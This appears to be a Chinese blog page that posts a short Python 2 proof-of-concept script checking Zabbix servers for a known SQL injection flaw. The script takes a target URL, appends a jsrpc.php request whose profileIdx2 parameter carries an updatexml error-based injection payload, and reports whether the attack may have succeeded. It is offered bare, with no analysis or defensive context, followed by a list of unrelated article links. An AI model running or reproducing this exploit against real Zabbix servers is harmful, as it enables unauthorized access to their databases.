zabbix(sql注入判断脚本)
2024-08-28 05:10:30
zabbix(sql注入判断脚本)
#-*-coding:utf-8-*-
# code by anyun.org
import urllib
import re def getHtml(url):
page = urllib.urlopen(url)
html = page.read()
html = html.replace('\n', '')
html = html.replace(' ', ' ')
html = html.replace(' ', '')
html = html.replace(' ', '')
return html url =raw_input('enter url:')
poc='jsrpc.php?type=9&method=screen.get×tamp=1471403798083&\
pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23\
&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17'
new_url=url+poc
try:
if getHtml(new_url).find('flickerfreescreen')<>0:
print 'maybe successeed'
else:
print 'maybe unsuccessed'
except:
print 'http error?'
最新文章
- linux下使用denyhosts防止ssh暴力破解
- [Recommendation System] 推荐系统之协同过滤(CF)算法详解和实现
- 用IIS配置反向代理
- 正则的小效果:------->; 过滤敏感词
- cache写策略
- Uva 10007 / HDU 1131 - Count the Trees (卡特兰数)
- C# web 网页刷新时数据集的保存和应用
- selenium webdriver(4)---模拟鼠标键盘操作
- 如何在windows/wamp环境下在本机配置站点
- [Android算法] bitmap 将图片压缩到指定的大小
- 使apache解析域名到目录的方法
- hdu1878判断欧拉回路
- <;<;精通iOS开发>;>;第14章例子代码彻底清除警告
- video自定义
- c++入门之——const在函数名前面和函数后面的区别
- 在 ubuntu 中安装 python3.5、 tornado、 pymysql
- 浅谈 .NET 中的对象引用、非托管指针和托管指针 理解C#中的闭包
- C++飞机大战
- CefSharp F12打开DevTools查看console
- JAVA Drp项目实战—— Unable to compile class for JSP 一波三折
热门文章
- EL表达式概述
- IOS 友盟使用详解
- Reveal使用步骤和 破解Revealapp的试用时间限制
- win8下出现安装sql2012 正在启动操作系统功能"NetFx3"
- FLUSH TABLES WITH READ LOCK
- git 一般的开发流程中的代码管理
- Html5如何使我们开发出来的应用或页面大小能适合各种高端手机使用
- android中TimePicker和DatePicker的简单使用
- 第六篇 :微信公众平台开发实战Java版之如何自定义微信公众号菜单
- Error: Could not access the Package Manager. Is the system running?